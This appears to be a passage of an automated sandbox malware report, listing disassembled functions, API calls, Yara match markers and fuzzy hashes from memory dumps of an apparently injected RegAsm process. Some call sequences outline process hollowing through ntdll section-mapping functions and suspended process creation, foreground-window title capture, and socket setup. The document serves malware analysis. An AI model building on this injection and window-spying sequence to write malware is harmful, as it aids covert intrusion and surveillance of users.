                          • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Alloc
                          • String ID: FlsAlloc
                          • API String ID: 2773662609-671089009
                          • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                          • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                          • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                          • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Alloc
                          • String ID: FlsAlloc
                          • API String ID: 2773662609-671089009
                          • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                          • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                          • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                          • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                          Strings
                          • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$FileSystem
                          • String ID: GetSystemTimePreciseAsFileTime
                          • API String ID: 2086374402-595813830
                          • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                          • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                          • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                          • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B824
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: GlobalMemoryStatus
                          • String ID: @
                          • API String ID: 1890195054-2766056989
                          • Opcode ID: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                          • Instruction ID: 3917006bb4bdf28dbebd301c315ba2c969ca89c82ab29e5da1363915d2377671
                          • Opcode Fuzzy Hash: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                          • Instruction Fuzzy Hash: EBE0C9B6901228EBCB10DFA9E94498DFBF8FF48620B008166ED08A3704D770A815CB94
                          APIs
                          • try_get_function.LIBVCRUNTIME ref: 10003B06
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: try_get_function
                          • String ID: FlsAlloc
                          • API String ID: 2742660187-671089009
                          • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                          • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                          • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                          • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                          APIs
                          • try_get_function.LIBVCRUNTIME ref: 00438E29
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: try_get_function
                          • String ID: FlsAlloc
                          • API String ID: 2742660187-671089009
                          • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                          • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                          • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                          • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: GlobalMemoryStatus
                          • String ID: @
                          • API String ID: 1890195054-2766056989
                          • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                          • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                          • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                          • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                          APIs
                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                          • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: CodeInfoPageValid
                          • String ID:
                          • API String ID: 546120528-0
                          • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                          • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                          • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                          • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                          APIs
                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                          • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CodeInfoPageValid
                          • String ID:
                          • API String ID: 546120528-0
                          • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                          • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                          • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                          • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                          APIs
                            • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                            • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                            • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                            • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                            • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                            • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                          • _free.LIBCMT ref: 10006CD7
                          • _free.LIBCMT ref: 10006D0D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorLast_abort
                          • String ID:
                          • API String ID: 2991157371-0
                          • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                          • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                          • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                          • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                            • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                          • _free.LIBCMT ref: 0044F050
                          • _free.LIBCMT ref: 0044F086
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorLast_abort
                          • String ID:
                          • API String ID: 2991157371-0
                          • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                          • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                          • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                          • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                          APIs
                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc__crt_fast_encode_pointer
                          • String ID:
                          • API String ID: 2279764990-0
                          • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                          • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                          • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                          • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                          APIs
                          • _free.LIBCMT ref: 00446227
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap$_free
                          • String ID:
                          • API String ID: 1482568997-0
                          • Opcode ID: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                          • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                          • Opcode Fuzzy Hash: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                          • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                          APIs
                          • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateEventStartupsocket
                          • String ID:
                          • API String ID: 1953588214-0
                          • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                          • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                          • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                          • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                          APIs
                          • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                          • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                          • String ID:
                          • API String ID: 3750050125-0
                          • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                          • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                          • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                          • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                          • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                          • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                          • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                          APIs
                          • GetForegroundWindow.USER32 ref: 0041BB49
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$ForegroundText
                          • String ID:
                          • API String ID: 29597999-0
                          • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                          • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                          • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                          • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                          APIs
                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                          • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                            • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                          • String ID:
                          • API String ID: 1170566393-0
                          • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                          • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                          • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                          • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                          APIs
                            • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                          • String ID:
                          • API String ID: 806969131-0
                          • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                          • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                          • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                          • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                          APIs
                            • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                          • String ID:
                          • API String ID: 806969131-0
                          • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                          • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                          • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                          • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                          APIs
                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                            • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                            • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                          • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                          • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                          • String ID:
                          • API String ID: 2948481953-0
                          • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                          • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                          • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                          • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                          APIs
                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                           • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: __crt_fast_encode_pointer
                          • String ID:
                          • API String ID: 3768137683-0
                          • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                          • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                          • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                          • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
